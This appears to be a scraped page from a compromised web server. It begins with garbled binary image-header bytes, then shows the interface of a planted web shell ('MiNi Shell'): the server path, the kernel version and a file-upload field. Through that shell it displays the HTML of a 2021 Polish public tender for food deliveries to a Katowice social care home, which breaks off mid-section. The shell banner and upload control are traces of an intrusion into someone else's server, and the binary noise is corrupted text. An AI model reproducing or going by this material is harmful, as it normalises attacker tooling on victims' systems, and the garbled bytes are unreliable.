JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211123/0027992602-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa żywności na potrzeby Domu Pomocy Społecznej „Zacisze” z podziałem na 9 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ &#34;ZACISZE&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000686641</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Traktorzystów 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-695</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322025432</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">322028791</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@dpszacisze.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.biuletyn.abip.pl/dpszacisze/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa żywności na potrzeby Domu Pomocy Społecznej „Zacisze” z podziałem na 9 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7ece332-4c39-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00279926</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011020/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa żywności na potrzeby Domu Pomocy Społecznej &#34;Zacisze&#34; z podziałem na 9 pakietów (części)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.biuletyn.abip.pl/dpszacisze/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, <br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ oraz ePUAPu dostępnego pod adresem https://epuap.gov.pl/wps/portal/ oraz poczty elektronicznej: <br/>przetargi@dpszacisze.katowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania <br/>z systemu miniPortal (dostępnym pod adresem: https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz Warunkach korzystania <br/>z elektronicznej platformy usług administracji publicznej (ePUAP) (dostępnych pod adresem: https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” <br/>i „Formularz do komunikacji”, wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Zamawiający przekazuje link do postępowania oraz ID postępowania (numer identyfikacyjny postępowania generowany przez miniPortal) w informacjach zawartych w SWZ. Dane postępowania można również wyszukać na liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki „Postępowania”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">szczegóły zawiera SWZ punkt 37</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">szczegóły zawiera SWZ punkt 37</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KP.260.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Boczek wędzony parzony	70	kg<br/>Flaki wołowe – krojone	150	kg<br/>Golonka wieprzowa	80	kg<br/>Nogi wieprzowe	80	kg<br/>Łopatka wieprzowa b/k	200	kg<br/>Wołowe z kością – szponder	100	kg<br/>Gulaszowe wołowe ekstra	100	kg<br/>Goleń wołowa b/k	70	kg<br/>Karczek wieprzowy b/k	150	kg<br/>Żeberka wieprzowe mięsne paski	100	kg<br/>Słonina 15	kg<br/>Ozory wieprzowe	60	kg<br/>Schab wieprzowy b/k	100	kg<br/>Wołowina b/k zrazowa	30	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurczaki	700	kg<br/>Filet z kurczaka	450	kg<br/>Podudzie-pałka z kurczaka	450	kg<br/>Filet z indyka	100	kg<br/>Skrzydła z kurczaka	260	kg<br/>Żołądki z kurczaka	50	kg<br/>Żołądki z indyka	30	kg<br/>Udziec z kurczaka b/k i skóry	80	kg<br/>Wątroba drobiowa	100	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112000-6 - Drób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kiełbasa podwawelska 65% mięsa	150	kg<br/>Parówkowa 50% mięsa	250	kg<br/>Parówka cienka 50% mięsa	100	kg<br/>Serdelki drobiowe 50% mięsa	80	kg<br/>Mortadela na bazie mięsa wieprzowego drobno zmielonego z przyprawami	120	kg<br/>Kiełbasa szynkowa 65% mięsa	200	kg<br/>Szynka wp.gotowana 80% mięsa	150	kg<br/>Filet maślany z piersi indyka 77% b/skóry,parzony o wysokiej zawartości białka	60	kg<br/>Szynka wp.pieczona 80% mięsa	80	kg<br/>Polędwica sopocka drobiowa	50	kg<br/>Szynka śląska 80% mięsa	100	kg<br/>Polędwica sopocka 150	kg<br/>Kaszanka	160	kg<br/>Szynkowa z kurczaka 65% mięsa	80	kg<br/>Szynka konserwowa	100	kg<br/>Salceson z indyka	40	kg<br/>Kiełbasa biała parzona	80	kg<br/>Pasztetowa drobiowa z dodatkiem wieprzowiny-surowce drob. 40% surowce wieprz. 40%	80	kg<br/>Mielonka wieprzowa	100	kg<br/>Salceson włoski	40	kg<br/>Krakowska parzona	100	kg<br/>Żywiecka pieczona	150	kg<br/>Pieczeń drobiowa	60	kg<br/>Schab pieczony	50	kg<br/>Polędwica z kurczaka	50	kg<br/>Szynka wędzona z fileta z kurczaka 90% mięsa	100	kg<br/>Indyk w galarecie	60	kg<br/>Szynka krucha parzona 81% mięsa wieprzowego	50	kg<br/>Pasztet pieczony-mięso 75% w tym mięso z kurczaka 41% mięso wieprz. 34%	30	kg<br/>Kiełbasa śląska 65% mięsa	200	kg<br/>Filet maślany z fileta z piersi kurczaka 85%,b/skóry,parzony	40	kg<br/>Wędlina kminkowa 65% mięsa	100	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131130-5 - Wędliny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Brukselka gat.I 40	kg<br/> Brokuły gat.I 200	kg<br/> Barszcz ukraiński gat.I 25	kg<br/> Fasola szparagowa zielona gat.I 100	kg<br/> Fasola szparagowa żółta gat.I	100	kg<br/> Marchew kostka gat.I 25	kg<br/> Mieszanka 7- skł. gat.I 100	kg<br/> Szpinak 2.0kg gat.I 60	kg<br/> Kalafior gat.I 100	kg<br/> Włoszczyzna paski gat.I 250	kg<br/>Bukiet kwiatowy warzyw gat.I	125	kg<br/> Mieszanka kompotowa gat.I 500	kg<br/> Wiśnia drylowana gat.I 25	kg<br/> Truskawka mrożona gat.I 80	kg<br/> Śliwka drylowana gat.I 50	kg<br/> Placki ziemniaczane 1.0kg	150	szt.<br/> Pierogi z mięsem typu Alex-Pol 150	kg<br/> Kluski śląskie typu Alex-Pol 150	kg<br/>Pyzy ziemniaczane typu Alex-Pol 80	kg<br/> Uszka z mięsem typu Alex-Pol 60	kg<br/> Porzeczka czarna gat.I	500	kg<br/>Aronia gat.I	30	kg<br/>Malina cała gat.I	20	kg<br/>Pierogi ruskie typu Alex-Pol 50	kg<br/>Pyzy ziemniaczane z mięsem typu Alex-Pol 150	kg<br/> Pierogi z serem typu Alex-Pol 50	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331100-8 - Warzywa świeże lub mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dżem truskawkowy(100g owoców/na 100g dżemu) 220g-300g 200	szt.<br/> Dżem czarna porzeczka(100g owoców/na 100g dżemu) 220g-300g	200	szt.<br/> Dżem wiśniowy(100g owoców/na 100g dżemu) 220g-300g	200	szt.<br/> Dżem morelowy(100g owoców/na 100g dżemu 220g-300g	200	szt.<br/> Dżem brzoskwiniowy(100g owoców/na 100g dżemu) 220g-300g	100	szt.<br/> Powidła śliwkowe ok.310g	100	szt.<br/> Jogurt naturalny 150g-175g 1500	szt.<br/> Jogurt naturalny 300g-400g	250	szt.<br/> Jogurt owocowy 150g	2000	szt.<br/> Kefir 200g-250g	2300	szt.<br/> Masło extra 82% tł. 200g.	5700	szt.<br/> Mleko 2% 0,9 l - folia	11000	szt.<br/> Mleko 2% 1,0 - karton	200	szt.<br/> Mleko zagęszczone niesł. 500g 4%tł.	160	szt.<br/> Margaryna mleczna 250g	1000	szt.<br/> Olej 1,0 l rzepakowy	130	szt.<br/> Olej 0,5 l rzepakowy	30	szt.<br/> Pasztet drobiowy 50g	2000	szt.<br/> Ser żółty twardy salami kl.I	120	kg<br/> Ser żółty pełnotłusty typ holendersko-szwajcarski kl.I	50	kg<br/> Ser topiony typu złoty ementaler 100g	4000	szt.<br/> Ser homogenizowany naturalny 150g	1600	szt.<br/> Ser twarogowy kanapkowy 150g	400	szt.<br/> Śmietana 18% 200g	1000	szt.<br/> Twaróg półtłusty 500	kg<br/> Ser homog.owocowy 140g -150g	3500	szt.<br/> Twaróg ziarnisty 150g	720	szt.<br/> Ser domowy smażony chudy	120	kg<br/> Śmietana spray 250g	50	szt.<br/> Kaszka mleczna 150g	700	szt.<br/> Deser budyniowy 125g	300	szt.<br/> Deser serniczkowy 150g	400	szt.<br/> Ser pleśniowy camembert 120g	100	szt.<br/> Masło roślinne kubek 500g	50	szt.<br/>Ser żółty pełnotłusty typ holenderski kl.I	80	kg<br/>Ser śmietankowy do smarowania - różne smaki 135g	300	szt.<br/>Ser topiony typu złoty ementaler 17,5g (różne smaki)	1600	szt.<br/>Ser naturalny typu Bieluch 150g	1000	szt.<br/> Dżem 25g	800	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15332290-3 - Dżemy</p> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub 